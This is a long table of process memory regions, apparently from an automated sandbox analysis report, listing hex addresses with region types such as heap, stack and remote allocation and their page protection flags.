|
28728E50000
|
trusted library allocation
|
page read and write
|
||
|
27618810000
|
heap
|
page read and write
|
||
|
F25AAFF000
|
stack
|
page read and write
|
||
|
20410F38000
|
heap
|
page read and write
|
||
|
1E084F7F000
|
heap
|
page read and write
|
||
|
2EA3000
|
unkown
|
page execute and read and write
|
||
|
276188B3000
|
heap
|
page read and write
|
||
|
7211F09000
|
stack
|
page read and write
|
||
|
20411100000
|
trusted library allocation
|
page read and write
|
||
|
27618E6D000
|
heap
|
page read and write
|
||
|
7FF582B0E000
|
unkown
|
page readonly
|
||
|
2D0D5140000
|
heap
|
page read and write
|
||
|
1DDB0A72000
|
heap
|
page read and write
|
||
|
1F2F33E000
|
stack
|
page read and write
|
||
|
2BAAE5C8000
|
unkown
|
page read and write
|
||
|
202C021E000
|
unkown
|
page read and write
|
||
|
2BAA7A71000
|
unkown
|
page readonly
|
||
|
1DDAEA05000
|
heap
|
page read and write
|
||
|
6B0236A000
|
stack
|
page read and write
|
||
|
26A88459000
|
heap
|
page read and write
|
||
|
276188CF000
|
heap
|
page read and write
|
||
|
2530E9FD000
|
heap
|
page read and write
|
||
|
7FF5812D2000
|
unkown
|
page readonly
|
||
|
20410F86000
|
heap
|
page read and write
|
||
|
1E084F48000
|
heap
|
page read and write
|
||
|
2B10000
|
unkown
|
page readonly
|
||
|
7FF582B52000
|
unkown
|
page readonly
|
||
|
26A87E8B000
|
heap
|
page read and write
|
||
|
FC849FB000
|
stack
|
page read and write
|
||
|
2BAAD520000
|
unkown
|
page readonly
|
||
|
202BFC4E000
|
unkown
|
page read and write
|
||
|
D01B07E000
|
unkown
|
page read and write
|
||
|
7FFD9B6BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
8C9ACFE000
|
stack
|
page read and write
|
||
|
7FF5135F0000
|
unkown
|
page readonly
|
||
|
27B0192E000
|
unkown
|
page read and write
|
||
|
A925272000
|
stack
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
4A10000
|
unkown
|
page read and write
|
||
|
7FF56971B000
|
unkown
|
page readonly
|
||
|
BC094FE000
|
stack
|
page read and write
|
||
|
2BAB2FB1000
|
unkown
|
page execute read
|
||
|
7FF5A94E2000
|
unkown
|
page readonly
|
||
|
24DA1BD0000
|
unkown
|
page readonly
|
||
|
2EB0000
|
unkown
|
page read and write
|
||
|
13870433000
|
heap
|
page read and write
|
||
|
13801837000
|
trusted library allocation
|
page read and write
|
||
|
26A87E51000
|
heap
|
page read and write
|
||
|
7FF5A9486000
|
unkown
|
page readonly
|
||
|
2D01000
|
unkown
|
page read and write
|
||
|
261C3DC0000
|
remote allocation
|
page execute and read and write
|
||
|
1DDAEA3E000
|
heap
|
page read and write
|
||
|
225DCB2D000
|
unkown
|
page read and write
|
||
|
28728EBA000
|
heap
|
page read and write
|
||
|
7FFD9B892000
|
trusted library allocation
|
page read and write
|
||
|
26A87E4E000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2041120A000
|
heap
|
page read and write
|
||
|
2BAACAB8000
|
unkown
|
page read and write
|
||
|
1386E0B2000
|
heap
|
page read and write
|
||
|
26A8843B000
|
heap
|
page read and write
|
||
|
8170000
|
unkown
|
page read and write
|
||
|
2BAAE40B000
|
unkown
|
page read and write
|
||
|
202C0991000
|
unkown
|
page readonly
|
||
|
1E0855D0000
|
heap
|
page read and write
|
||
|
20412FFD000
|
heap
|
page read and write
|
||
|
8C9A11A000
|
stack
|
page read and write
|
||
|
6B027FE000
|
stack
|
page read and write
|
||
|
7DF486AD1000
|
unkown
|
page execute read
|
||
|
7FF52D156000
|
unkown
|
page readonly
|
||
|
7FF5135C7000
|
unkown
|
page readonly
|
||
|
1E086E54000
|
heap
|
page read and write
|
||
|
1DDAF1DC000
|
heap
|
page read and write
|
||
|
1E084F7C000
|
heap
|
page read and write
|
||
|
1DDAECD3000
|
heap
|
page read and write
|
||
|
27618E72000
|
heap
|
page read and write
|
||
|
C5F70FC000
|
stack
|
page read and write
|
||
|
7DF486A50000
|
unkown
|
page readonly
|
||
|
2BAAC5F1000
|
unkown
|
page read and write
|
||
|
6B02EFE000
|
stack
|
page read and write
|
||
|
2BAAE5A9000
|
unkown
|
page read and write
|
||
|
27618E4C000
|
heap
|
page read and write
|
||
|
2D0D4BD0000
|
heap
|
page read and write
|
||
|
6ED517E000
|
stack
|
page read and write
|
||
|
20410FA4000
|
heap
|
page read and write
|
||
|
26A87E28000
|
heap
|
page read and write
|
||
|
1E084F7B000
|
heap
|
page read and write
|
||
|
2BAAEB98000
|
unkown
|
page read and write
|
||
|
EADEA7F000
|
stack
|
page read and write
|
||
|
20410FA3000
|
heap
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
2BAAE5EF000
|
unkown
|
page read and write
|
||
|
2BAACB7D000
|
unkown
|
page read and write
|
||
|
1386FBC0000
|
heap
|
page read and write
|
||
|
202C043D000
|
unkown
|
page read and write
|
||
|
20411762000
|
heap
|
page read and write
|
||
|
2530E990000
|
heap
|
page read and write
|
||
|
1E086E64000
|
heap
|
page read and write
|
||
|
2BAADDB0000
|
unkown
|
page readonly
|
||
|
D01BB7E000
|
unkown
|
page read and write
|
||
|
13801640000
|
trusted library allocation
|
page read and write
|
||
|
2761A6E5000
|
heap
|
page read and write
|
||
|
1DDAEA1E000
|
heap
|
page read and write
|
||
|
2BAAB966000
|
unkown
|
page read and write
|
||
|
30D2000
|
unkown
|
page read and write
|
||
|
26A8841E000
|
heap
|
page read and write
|
||
|
2BAAE340000
|
unkown
|
page read and write
|
||
|
1E4E9F54000
|
heap
|
page read and write
|
||
|
7FF581367000
|
unkown
|
page readonly
|
||
|
225DC012000
|
heap
|
page read and write
|
||
|
2BAAC62A000
|
unkown
|
page read and write
|
||
|
7FF5813E6000
|
unkown
|
page readonly
|
||
|
1E084F66000
|
heap
|
page read and write
|
||
|
7FFD9B6C0000
|
trusted library allocation
|
page read and write
|
||
|
26A87E52000
|
heap
|
page read and write
|
||
|
276188EF000
|
heap
|
page read and write
|
||
|
202C0279000
|
unkown
|
page read and write
|
||
|
26A87E43000
|
heap
|
page read and write
|
||
|
202C0249000
|
unkown
|
page read and write
|
||
|
28728CA1000
|
heap
|
page read and write
|
||
|
2295CE2A000
|
unkown
|
page read and write
|
||
|
202C0500000
|
unkown
|
page read and write
|
||
|
2D0D5070000
|
trusted library allocation
|
page read and write
|
||
|
138010F7000
|
trusted library allocation
|
page read and write
|
||
|
2D0D4A88000
|
heap
|
page read and write
|
||
|
20411768000
|
heap
|
page read and write
|
||
|
28728CC2000
|
heap
|
page read and write
|
||
|
20411785000
|
heap
|
page read and write
|
||
|
25800EFB000
|
unkown
|
page read and write
|
||
|
17953102000
|
unkown
|
page read and write
|
||
|
24D9FE80000
|
unkown
|
page read and write
|
||
|
1E084F59000
|
heap
|
page read and write
|
||
|
26A8841A000
|
heap
|
page read and write
|
||
|
27618E3A000
|
heap
|
page read and write
|
||
|
75EA4FF000
|
stack
|
page read and write
|
||
|
1386FA27000
|
heap
|
page read and write
|
||
|
7FF5504E9000
|
unkown
|
page readonly
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
28728CBA000
|
heap
|
page read and write
|
||
|
2BAAAD47000
|
unkown
|
page read and write
|
||
|
1E0855C5000
|
heap
|
page read and write
|
||
|
2BAAC6C7000
|
unkown
|
page read and write
|
||
|
13800AEC000
|
trusted library allocation
|
page read and write
|
||
|
BC093F9000
|
stack
|
page read and write
|
||
|
7FF52CFD6000
|
unkown
|
page readonly
|
||
|
2BAB2FC5000
|
unkown
|
page readonly
|
||
|
7FF5134B1000
|
unkown
|
page readonly
|
||
|
7DF486A20000
|
unkown
|
page readonly
|
||
|
26A87C40000
|
heap
|
page read and write
|
||
|
2530EBB5000
|
heap
|
page read and write
|
||
|
21A1F6A3000
|
heap
|
page read and write
|
||
|
7FF582B9C000
|
unkown
|
page readonly
|
||
|
20411100000
|
heap
|
page read and write
|
||
|
2D0D62A0000
|
trusted library allocation
|
page read and write
|
||
|
1E086E5D000
|
heap
|
page read and write
|
||
|
20410F30000
|
heap
|
page read and write
|
||
|
179534E1000
|
unkown
|
page readonly
|
||
|
7FF52D133000
|
unkown
|
page readonly
|
||
|
7FF52D046000
|
unkown
|
page readonly
|
||
|
6ED54FE000
|
unkown
|
page readonly
|
||
|
7DF486A21000
|
unkown
|
page execute read
|
||
|
7FF52D1E9000
|
unkown
|
page readonly
|
||
|
FC84AFE000
|
stack
|
page read and write
|
||
|
2D0D5893000
|
trusted library allocation
|
page read and write
|
||
|
27618893000
|
heap
|
page read and write
|
||
|
20410FBE000
|
heap
|
page read and write
|
||
|
26A8843B000
|
heap
|
page read and write
|
||
|
2BAAAD0D000
|
unkown
|
page read and write
|
||
|
1DDAEA50000
|
heap
|
page read and write
|
||
|
287293BF000
|
heap
|
page read and write
|
||
|
20411207000
|
heap
|
page read and write
|
||
|
2BAAD700000
|
unkown
|
page readonly
|
||
|
21A1F6A3000
|
heap
|
page read and write
|
||
|
4B5C000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
721267E000
|
stack
|
page read and write
|
||
|
7FF5812CB000
|
unkown
|
page readonly
|
||
|
20410F66000
|
heap
|
page read and write
|
||
|
2BAAD2C9000
|
unkown
|
page read and write
|
||
|
26A8841E000
|
heap
|
page read and write
|
||
|
7FFD9B6D0000
|
trusted library allocation
|
page read and write
|
||
|
FC8497E000
|
stack
|
page read and write
|
||
|
1F2EC73000
|
stack
|
page read and write
|
||
|
27B0860B000
|
unkown
|
page read and write
|
||
|
8B389FE000
|
unkown
|
page readonly
|
||
|
2BAAC572000
|
unkown
|
page read and write
|
||
|
138703FB000
|
heap
|
page read and write
|
||
|
1DDAEA49000
|
heap
|
page read and write
|
||
|
2BAAD328000
|
unkown
|
page read and write
|
||
|
2BAADDF0000
|
unkown
|
page read and write
|
||
|
7FF52D14A000
|
unkown
|
page readonly
|
||
|
1387046A000
|
heap
|
page read and write
|
||
|
2761A6E3000
|
heap
|
page read and write
|
||
|
7FF582BDB000
|
unkown
|
page readonly
|
||
|
751E000
|
unkown
|
page read and write
|
||
|
2761A6E0000
|
heap
|
page read and write
|
||
|
20410F84000
|
heap
|
page read and write
|
||
|
1DDAEA3E000
|
heap
|
page read and write
|
||
|
2BAA7C73000
|
heap
|
page read and write
|
||
|
26A8842C000
|
heap
|
page read and write
|
||
|
225DC670000
|
unkown
|
page readonly
|
||
|
28728CAE000
|
heap
|
page read and write
|
||
|
2872ACD4000
|
heap
|
page read and write
|
||
|
1E084F91000
|
heap
|
page read and write
|
||
|
7DF486AA0000
|
unkown
|
page readonly
|
||
|
7FF52CB4E000
|
unkown
|
page readonly
|
||
|
7FF5A94FD000
|
unkown
|
page readonly
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
1A6103A0000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2BAAACE3000
|
unkown
|
page read and write
|
||
|
2295CF13000
|
unkown
|
page read and write
|
||
|
276188CB000
|
heap
|
page read and write
|
||
|
225DBF40000
|
heap
|
page read and write
|
||
|
27B08E0B000
|
unkown
|
page read and write
|
||
|
7FFD9B6B4000
|
trusted library allocation
|
page read and write
|
||
|
2BAAE14D000
|
unkown
|
page read and write
|
||
|
2295CD20000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2BAAC545000
|
unkown
|
page read and write
|
||
|
2BAAF190000
|
unkown
|
page read and write
|
||
|
7DF4869B0000
|
unkown
|
page readonly
|
||
|
4B56000
|
unkown
|
page read and write
|
||
|
737E000
|
unkown
|
page read and write
|
||
|
2BAAD36B000
|
unkown
|
page read and write
|
||
|
2BAAA569000
|
unkown
|
page read and write
|
||
|
1DDAEA50000
|
heap
|
page read and write
|
||
|
287293CC000
|
heap
|
page read and write
|
||
|
A9257FF000
|
unkown
|
page read and write
|
||
|
27B06C3F000
|
unkown
|
page read and write
|
||
|
1C8DBAA2000
|
unkown
|
page readonly
|
||
|
1E084F25000
|
heap
|
page read and write
|
||
|
7FF582B9A000
|
unkown
|
page readonly
|
||
|
225DBF71000
|
unkown
|
page readonly
|
||
|
2BAAE150000
|
unkown
|
page read and write
|
||
|
276188F1000
|
heap
|
page read and write
|
||
|
7DF4869F1000
|
unkown
|
page execute read
|
||
|
C7E8F3B000
|
stack
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2C4E000
|
unkown
|
page read and write
|
||
|
2BAAC6C5000
|
unkown
|
page read and write
|
||
|
8B3877C000
|
unkown
|
page read and write
|
||
|
1DDB0A84000
|
heap
|
page read and write
|
||
|
20E8B1C0000
|
remote allocation
|
page execute and read and write
|
||
|
1E085465000
|
heap
|
page read and write
|
||
|
F25A87F000
|
stack
|
page read and write
|
||
|
24D9FFC9000
|
direct allocation
|
page readonly
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
13801AD3000
|
trusted library allocation
|
page read and write
|
||
|
1DDAE9E6000
|
heap
|
page read and write
|
||
|
1DDAEA12000
|
heap
|
page read and write
|
||
|
1DDAEA3E000
|
heap
|
page read and write
|
||
|
13800ADE000
|
trusted library allocation
|
page read and write
|
||
|
28728CB0000
|
heap
|
page read and write
|
||
|
E2BF1FB000
|
stack
|
page read and write
|
||
|
7DF486A90000
|
unkown
|
page readonly
|
||
|
1E0855D9000
|
heap
|
page read and write
|
||
|
26A87E59000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2E90000
|
unkown
|
page read and write
|
||
|
2761889D000
|
heap
|
page read and write
|
||
|
287293A9000
|
heap
|
page read and write
|
||
|
27618E5C000
|
heap
|
page read and write
|
||
|
2BAA7CC0000
|
unkown
|
page readonly
|
||
|
1DDAEA18000
|
heap
|
page read and write
|
||
|
27B00F2E000
|
unkown
|
page read and write
|
||
|
2BAAD0F0000
|
unkown
|
page read and write
|
||
|
FC84E7B000
|
stack
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
26A87200000
|
unkown
|
page read and write
|
||
|
1386FC97000
|
heap
|
page read and write
|
||
|
26A87DF9000
|
heap
|
page read and write
|
||
|
202BFA40000
|
heap
|
page read and write
|
||
|
27B02D2E000
|
unkown
|
page read and write
|
||
|
2BAAC55D000
|
unkown
|
page read and write
|
||
|
2BAAA0A0000
|
unkown
|
page read and write
|
||
|
2BAAE58D000
|
unkown
|
page read and write
|
||
|
2BAAC700000
|
unkown
|
page read and write
|
||
|
2BAAC5AA000
|
unkown
|
page read and write
|
||
|
2BAA7B46000
|
heap
|
page read and write
|
||
|
202C0200000
|
unkown
|
page read and write
|
||
|
28728CB0000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2BAAEBE0000
|
unkown
|
page read and write
|
||
|
2BAAC56C000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
13801673000
|
trusted library allocation
|
page read and write
|
||
|
28728CCE000
|
heap
|
page read and write
|
||
|
7FF513559000
|
unkown
|
page readonly
|
||
|
6B02AFF000
|
stack
|
page read and write
|
||
|
20410FA8000
|
heap
|
page read and write
|
||
|
73A0000
|
unkown
|
page execute and read and write
|
||
|
28728E30000
|
heap
|
page read and write
|
||
|
2C8F000
|
unkown
|
page read and write
|
||
|
1DDAECDB000
|
heap
|
page read and write
|
||
|
1E0855D0000
|
heap
|
page read and write
|
||
|
24D9FFC2000
|
direct allocation
|
page readonly
|
||
|
13801A58000
|
trusted library allocation
|
page read and write
|
||
|
26A88451000
|
heap
|
page read and write
|
||
|
1DDAEA20000
|
heap
|
page read and write
|
||
|
27618900000
|
heap
|
page read and write
|
||
|
2A660685000
|
unkown
|
page read and write
|
||
|
73B0000
|
unkown
|
page read and write
|
||
|
7FF513538000
|
unkown
|
page readonly
|
||
|
D01AF78000
|
unkown
|
page read and write
|
||
|
7FFD9B76C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF5812F6000
|
unkown
|
page readonly
|
||
|
225DCB26000
|
unkown
|
page read and write
|
||
|
2D0D578B000
|
trusted library allocation
|
page read and write
|
||
|
7FF582BD3000
|
unkown
|
page readonly
|
||
|
7FF52D109000
|
unkown
|
page readonly
|
||
|
276188CF000
|
heap
|
page read and write
|
||
|
1E08546E000
|
heap
|
page read and write
|
||
|
7FFD9B6B0000
|
trusted library allocation
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7DF486AD0000
|
unkown
|
page readonly
|
||
|
2BAB057F000
|
unkown
|
page read and write
|
||
|
1DDAE9E4000
|
heap
|
page read and write
|
||
|
7DF486AB0000
|
unkown
|
page readonly
|
||
|
7FF52D15B000
|
unkown
|
page readonly
|
||
|
1F2EEFE000
|
stack
|
page read and write
|
||
|
276188EA000
|
heap
|
page read and write
|
||
|
27618E75000
|
heap
|
page read and write
|
||
|
24D9FFB5000
|
direct allocation
|
page readonly
|
||
|
2BAA8051000
|
unkown
|
page readonly
|
||
|
1C8EE6E6000
|
trusted library allocation
|
page read and write
|
||
|
A92537E000
|
unkown
|
page read and write
|
||
|
289C000
|
stack
|
page read and write
|
||
|
7FF5132CA000
|
unkown
|
page readonly
|
||
|
1E0855D0000
|
heap
|
page read and write
|
||
|
1386FC60000
|
heap
|
page execute and read and write
|
||
|
2D0D4A2B000
|
heap
|
page read and write
|
||
|
24D9FE40000
|
unkown
|
page read and write
|
||
|
7FF582B07000
|
unkown
|
page readonly
|
||
|
1C8DBF96000
|
heap
|
page read and write
|
||
|
27618E5C000
|
heap
|
page read and write
|
||
|
27B06C3D000
|
unkown
|
page read and write
|
||
|
2BAB2FD0000
|
unkown
|
page read and write
|
||
|
1386E02D000
|
heap
|
page read and write
|
||
|
24DA1AD0000
|
unkown
|
page read and write
|
||
|
225DC010000
|
heap
|
page read and write
|
||
|
28728CD4000
|
heap
|
page read and write
|
||
|
24D9FED0000
|
unkown
|
page read and write
|
||
|
1E0855E2000
|
heap
|
page read and write
|
||
|
6ED51FE000
|
unkown
|
page readonly
|
||
|
2A66062A000
|
unkown
|
page read and write
|
||
|
28728CC0000
|
heap
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF513435000
|
unkown
|
page readonly
|
||
|
2220C4F0000
|
remote allocation
|
page execute and read and write
|
||
|
26A88413000
|
heap
|
page read and write
|
||
|
287293B4000
|
heap
|
page read and write
|
||
|
26A87E79000
|
heap
|
page read and write
|
||
|
20410F67000
|
heap
|
page read and write
|
||
|
2BAADCC0000
|
unkown
|
page readonly
|
||
|
2BAACBB4000
|
unkown
|
page read and write
|
||
|
179532E0000
|
unkown
|
page readonly
|
||
|
2BAAE599000
|
unkown
|
page read and write
|
||
|
721277A000
|
stack
|
page read and write
|
||
|
26A88449000
|
heap
|
page read and write
|
||
|
28728CD2000
|
heap
|
page read and write
|
||
|
2BAAD0C0000
|
unkown
|
page readonly
|
||
|
7FFD9B7A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF4869F0000
|
unkown
|
page readonly
|
||
|
20413004000
|
heap
|
page read and write
|
||
|
F25ABF8000
|
stack
|
page read and write
|
||
|
27618E30000
|
heap
|
page read and write
|
||
|
24D9FF30000
|
heap
|
page read and write
|
||
|
2530EBB0000
|
heap
|
page read and write
|
||
|
1386FB40000
|
trusted library allocation
|
page read and write
|
||
|
26A87E33000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2BAAE8FD000
|
unkown
|
page read and write
|
||
|
27618E69000
|
heap
|
page read and write
|
||
|
2BAAC549000
|
unkown
|
page read and write
|
||
|
26A89CD4000
|
heap
|
page read and write
|
||
|
23ED9620000
|
heap
|
page read and write
|
||
|
7FF52CB5E000
|
unkown
|
page readonly
|
||
|
2CA1000
|
unkown
|
page readonly
|
||
|
A925679000
|
unkown
|
page read and write
|
||
|
7FF581499000
|
unkown
|
page readonly
|
||
|
202C0B25000
|
unkown
|
page readonly
|
||
|
287293CD000
|
heap
|
page read and write
|
||
|
26A8841A000
|
heap
|
page read and write
|
||
|
123B8520000
|
unkown
|
page execute and read and write
|
||
|
1E08546A000
|
heap
|
page read and write
|
||
|
276188B1000
|
heap
|
page read and write
|
||
|
1E086E64000
|
heap
|
page read and write
|
||
|
27618900000
|
heap
|
page read and write
|
||
|
2761A6EE000
|
heap
|
page read and write
|
||
|
4C7BF5000
|
stack
|
page read and write
|
||
|
276188D6000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7FF52D12C000
|
unkown
|
page readonly
|
||
|
3280000
|
heap
|
page read and write
|
||
|
2BAACADA000
|
unkown
|
page read and write
|
||
|
6B02FFB000
|
stack
|
page read and write
|
||
|
684C87E000
|
stack
|
page read and write
|
||
|
721297D000
|
stack
|
page read and write
|
||
|
2BAA94E4000
|
unkown
|
page read and write
|
||
|
7FF513581000
|
unkown
|
page readonly
|
||
|
2041176E000
|
heap
|
page read and write
|
||
|
2530E8B0000
|
heap
|
page read and write
|
||
|
2BAAD33E000
|
unkown
|
page read and write
|
||
|
7FF5A9549000
|
unkown
|
page readonly
|
||
|
7FF513572000
|
unkown
|
page readonly
|
||
|
7FF58142A000
|
unkown
|
page readonly
|
||
|
1C8DAFBE000
|
unkown
|
page readonly
|
||
|
6ED50FE000
|
unkown
|
page readonly
|
||
|
2761A850000
|
heap
|
page read and write
|
||
|
2BAACB7B000
|
unkown
|
page read and write
|
||
|
1380175E000
|
trusted library allocation
|
page read and write
|
||
|
1DDAF1F9000
|
heap
|
page read and write
|
||
|
2BAAC836000
|
unkown
|
page read and write
|
||
|
28728CC8000
|
heap
|
page read and write
|
||
|
7FFD9B6B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
24D9FD20000
|
unkown
|
page read and write
|
||
|
7FF581399000
|
unkown
|
page readonly
|
||
|
2D0D49E8000
|
heap
|
page read and write
|
||
|
2BAA7960000
|
unkown
|
page readonly
|
||
|
13801608000
|
trusted library allocation
|
page read and write
|
||
|
1DDAF209000
|
heap
|
page read and write
|
||
|
1C8DBE60000
|
heap
|
page read and write
|
||
|
1E086E52000
|
heap
|
page read and write
|
||
|
2BAA9E50000
|
unkown
|
page read and write
|
||
|
2BAAD322000
|
unkown
|
page read and write
|
||
|
7FF5812BF000
|
unkown
|
page readonly
|
||
|
28728CD4000
|
heap
|
page read and write
|
||
|
1E084F25000
|
heap
|
page read and write
|
||
|
708F000
|
unkown
|
page read and write
|
||
|
26A88459000
|
heap
|
page read and write
|
||
|
7FF52D191000
|
unkown
|
page readonly
|
||
|
287293B8000
|
heap
|
page read and write
|
||
|
1DDAEA12000
|
heap
|
page read and write
|
||
|
20410F47000
|
heap
|
page read and write
|
||
|
26A87E56000
|
heap
|
page read and write
|
||
|
276188C2000
|
heap
|
page read and write
|
||
|
2BAAC740000
|
unkown
|
page readonly
|
||
|
2BAAA0AD000
|
unkown
|
page read and write
|
||
|
287293B4000
|
heap
|
page read and write
|
||
|
26A871E0000
|
heap
|
page read and write
|
||
|
1E084F8D000
|
heap
|
page read and write
|
||
|
2220AB60000
|
unkown
|
page execute and read and write
|
||
|
2BAAE5AF000
|
unkown
|
page read and write
|
||
|
28728CEE000
|
heap
|
page read and write
|
||
|
EADEBFF000
|
stack
|
page read and write
|
||
|
1C8DB029000
|
unkown
|
page readonly
|
||
|
2BAB05C4000
|
unkown
|
page read and write
|
||
|
1386E08C000
|
heap
|
page read and write
|
||
|
27618894000
|
heap
|
page read and write
|
||
|
21A1F6B0000
|
heap
|
page read and write
|
||
|
7E00736C5000
|
unkown
|
page readonly
|
||
|
7DF4869C0000
|
unkown
|
page readonly
|
||
|
202BF9C0000
|
unkown
|
page readonly
|
||
|
123B8520000
|
remote allocation
|
page execute and read and write
|
||
|
24D9FFE5000
|
heap
|
page read and write
|
||
|
21A1F6A3000
|
heap
|
page read and write
|
||
|
C7E99FE000
|
unkown
|
page readonly
|
||
|
202BFC89000
|
unkown
|
page read and write
|
||
|
7FF52D106000
|
unkown
|
page readonly
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
202BFC2F000
|
unkown
|
page read and write
|
||
|
A92557E000
|
unkown
|
page read and write
|
||
|
2BAAC6DA000
|
unkown
|
page read and write
|
||
|
2872ACCE000
|
heap
|
page read and write
|
||
|
2BAAA00A000
|
unkown
|
page read and write
|
||
|
27618E5C000
|
heap
|
page read and write
|
||
|
2BAAE649000
|
unkown
|
page read and write
|
||
|
26A87E64000
|
heap
|
page read and write
|
||
|
22D862F5000
|
heap
|
page read and write
|
||
|
26A87E49000
|
heap
|
page read and write
|
||
|
EADEB7F000
|
stack
|
page read and write
|
||
|
21A1F6A3000
|
heap
|
page read and write
|
||
|
75DE000
|
unkown
|
page read and write
|
||
|
1E4E9F30000
|
heap
|
page read and write
|
||
|
258004FB000
|
unkown
|
page read and write
|
||
|
7DF4869D0000
|
unkown
|
page readonly
|
||
|
C7E9B7E000
|
stack
|
page read and write
|
||
|
8B3867E000
|
unkown
|
page read and write
|
||
|
4E19000
|
unkown
|
page read and write
|
||
|
7FF5504A2000
|
unkown
|
page readonly
|
||
|
1E0855E9000
|
heap
|
page read and write
|
||
|
26A87D60000
|
heap
|
page read and write
|
||
|
7FF512433000
|
unkown
|
page readonly
|
||
|
2BAAC4D0000
|
unkown
|
page read and write
|
||
|
2BAAD360000
|
unkown
|
page read and write
|
||
|
4B04000
|
unkown
|
page read and write
|
||
|
28728CA2000
|
heap
|
page read and write
|
||
|
1E08546E000
|
heap
|
page read and write
|
||
|
813A000
|
unkown
|
page read and write
|
||
|
26A88417000
|
heap
|
page read and write
|
||
|
27B06C11000
|
unkown
|
page read and write
|
||
|
1E086E56000
|
heap
|
page read and write
|
||
|
2BAAAD07000
|
unkown
|
page read and write
|
||
|
F25AD7C000
|
stack
|
page read and write
|
||
|
28728C77000
|
heap
|
page read and write
|
||
|
1E08546A000
|
heap
|
page read and write
|
||
|
7FF581266000
|
unkown
|
page readonly
|
||
|
2BAAD32D000
|
unkown
|
page read and write
|
||
|
26A871B0000
|
heap
|
page read and write
|
||
|
27B06C33000
|
unkown
|
page read and write
|
||
|
1DDAF1F9000
|
heap
|
page read and write
|
||
|
28728CC2000
|
heap
|
page read and write
|
||
|
20412FF4000
|
heap
|
page read and write
|
||
|
2BAACB57000
|
unkown
|
page read and write
|
||
|
202C0390000
|
unkown
|
page read and write
|
||
|
20410F84000
|
heap
|
page read and write
|
||
|
26A8843B000
|
heap
|
page read and write
|
||
|
7FF5122F1000
|
unkown
|
page readonly
|
||
|
138010AF000
|
trusted library allocation
|
page read and write
|
||
|
287293BF000
|
heap
|
page read and write
|
||
|
28728CCB000
|
heap
|
page read and write
|
||
|
2BAA94BB000
|
unkown
|
page read and write
|
||
|
1F2FE8E000
|
stack
|
page read and write
|
||
|
2D0D57EB000
|
trusted library allocation
|
page read and write
|
||
|
765D000
|
unkown
|
page read and write
|
||
|
7FF581388000
|
unkown
|
page readonly
|
||
|
7FFD9B6C4000
|
trusted library allocation
|
page read and write
|
||
|
179532D0000
|
heap
|
page read and write
|
||
|
2041176E000
|
heap
|
page read and write
|
||
|
225DC9B0000
|
unkown
|
page read and write
|
||
|
2BAAAD43000
|
unkown
|
page read and write
|
||
|
70CD000
|
unkown
|
page read and write
|
||
|
2B00000
|
unkown
|
page readonly
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2BAA7B36000
|
heap
|
page read and write
|
||
|
1E084F07000
|
heap
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
2BAADCE0000
|
unkown
|
page readonly
|
||
|
26A8844B000
|
heap
|
page read and write
|
||
|
7DF4869D1000
|
unkown
|
page execute read
|
||
|
202BF9B0000
|
unkown
|
page readonly
|
||
|
2BAAAC32000
|
unkown
|
page read and write
|
||
|
276187C0000
|
heap
|
page read and write
|
||
|
20411758000
|
heap
|
page read and write
|
||
|
27618872000
|
heap
|
page read and write
|
||
|
1DDAE9B0000
|
heap
|
page read and write
|
||
|
2BAB0686000
|
unkown
|
page read and write
|
||
|
2BAAC626000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7FF52D115000
|
unkown
|
page readonly
|
||
|
26A87E79000
|
heap
|
page read and write
|
||
|
2BAAED70000
|
unkown
|
page read and write
|
||
|
1E084E10000
|
heap
|
page read and write
|
||
|
2041175C000
|
heap
|
page read and write
|
||
|
C19D87F000
|
stack
|
page read and write
|
||
|
225DBF50000
|
unkown
|
page read and write
|
||
|
7FF52D18B000
|
unkown
|
page readonly
|
||
|
28728CD3000
|
heap
|
page read and write
|
||
|
2BAAA522000
|
unkown
|
page read and write
|
||
|
1C8EE4F9000
|
trusted library allocation
|
page read and write
|
||
|
225DC5C0000
|
unkown
|
page write copy
|
||
|
7FF581441000
|
unkown
|
page readonly
|
||
|
27618897000
|
heap
|
page read and write
|
||
|
2BAAA00C000
|
unkown
|
page read and write
|
||
|
26A87B02000
|
unkown
|
page read and write
|
||
|
20410FA3000
|
heap
|
page read and write
|
||
|
287293C9000
|
heap
|
page read and write
|
||
|
20410FA3000
|
heap
|
page read and write
|
||
|
26A88451000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7FF582BD8000
|
unkown
|
page readonly
|
||
|
13801152000
|
trusted library allocation
|
page read and write
|
||
|
20411200000
|
heap
|
page read and write
|
||
|
7FF582C09000
|
unkown
|
page readonly
|
||
|
138702F5000
|
heap
|
page read and write
|
||
|
6B029FF000
|
stack
|
page read and write
|
||
|
